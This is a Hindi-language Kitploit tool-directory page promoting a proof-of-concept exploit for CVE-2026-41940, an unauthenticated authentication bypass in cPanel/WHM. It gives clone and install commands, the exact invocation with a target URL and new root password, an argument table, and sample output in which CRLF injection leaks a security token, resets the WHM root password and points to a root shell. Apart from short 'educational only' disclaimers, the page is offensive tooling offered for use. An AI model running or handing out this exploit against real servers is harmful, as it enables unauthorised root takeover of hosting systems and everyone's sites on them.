Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940 — CVE-2026-41940 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, cPanel/WHM में एक अनप्रमाणित प्रमाणीकरण बायपास जो सुरक्षा टोकन लीक करने और रूट पासवर्ड रीसेट करने के लिए CRLF इंजेक्शन का उपयोग करता है। | Kitploit
उपकरण/GitHubGitHub/rosemary1337/cve-2026-41940
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubrosemary1337/cve-2026-41940

CVE-2026-41940

CVE-2026-41940 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, cPanel/WHM में एक अनप्रमाणित प्रमाणीकरण बायपास जो सुरक्षा टोकन लीक करने और रूट पासवर्ड रीसेट करने के लिए CRLF इंजेक्शन का उपयोग करता है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41940 स्वचालित एक्सप्लॉइट

Python Status Author


अवलोकन

CVE-2026-41940 एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है जो cPanel/WHM को लक्षित करता है।
यह एक्सप्लॉइट CRLF इंजेक्शन का उपयोग करके अप्रमाणित प्रमाणीकरण बायपास प्रदर्शित करता है, जिससे सुरक्षा टोकन लीक होते हैं और WHM इंटरफ़ेस तक रूट-स्तरीय पहुंच प्राप्त होती है, जिससे रूट पासवर्ड बदलने जैसी क्रियाएं संभव होती हैं।

अस्वीकरण: यह PoC केवल शैक्षिक उद्देश्यों के लिए है। बिना अनुमति के सिस्टम पर उपयोग न करें।


विशेषताएं

  • होस्टनाम स्वतः-खोज: Host हेडर प्रतिबंधों को बायपास करने के लिए कैनोनिकल होस्टनाम की स्वचालित पहचान।
  • प्री-ऑथ सत्र निर्माण: इंजेक्शन के लिए एक मान्य प्रारंभिक सत्र उत्पन्न करता है।
  • CRLF इंजेक्शन: cp_security_token लीक करने के लिए हेडर में इंजेक्शन का लाभ उठाता है।
  • सत्र प्रसार: लीक किए गए टोकन को सर्वर के ऑथ कैश में मजबूर करता है।
  • रूट पासवर्ड रीसेट: सफल बायपास पर WHM रूट पासवर्ड स्वचालित रूप से बदलता है।
  • न्यूनतम निर्भरताएं: मानक requests लाइब्रेरी के साथ काम करता है।

स्थापना

  1. रिपॉजिटरी क्लोन करें:
root@kitploit:~
git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
  1. निर्भरताएं स्थापित करें:
root@kitploit:~
pip install requests

आवश्यकताएं: requests, urllib3


उपयोग

root@kitploit:~
python3 CVE_2026_41940.py --target <TARGET_URL> --password <NEW_PASSWORD>

उदाहरण:

root@kitploit:~
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!

तर्क


आउटपुट

कंसोल दिखाता है:

  • स्थिति संदेश [0-4]
  • सफलता [+]
  • विफलता [!]
  • जानकारी [*]

उदाहरण:

root@kitploit:~
[0] hostname = target.local
[1] minting a preauth session...
    session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.12"}
[*] changing the root password
    passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell

सुरक्षा और अस्वीकरण

  • केवल शैक्षिक और परीक्षण उद्देश्यों के लिए।
  • स्पष्ट अनुमति के बिना वेबसाइटों पर हमला न करें।
  • केवल नियंत्रित प्रयोगशाला या अधिकृत पैठ परीक्षण में उपयोग करें।
टूल डाउनलोड करें
फ्लैगविवरणआवश्यकडिफ़ॉल्ट
--targetWHM लक्ष्य URL (जैसे, https://host:2087)हाँ-
--passwordरूट उपयोगकर्ता के लिए नया पासवर्डहाँ-
--hostnameHost: हेडर ओवरराइड करेंनहींस्वतः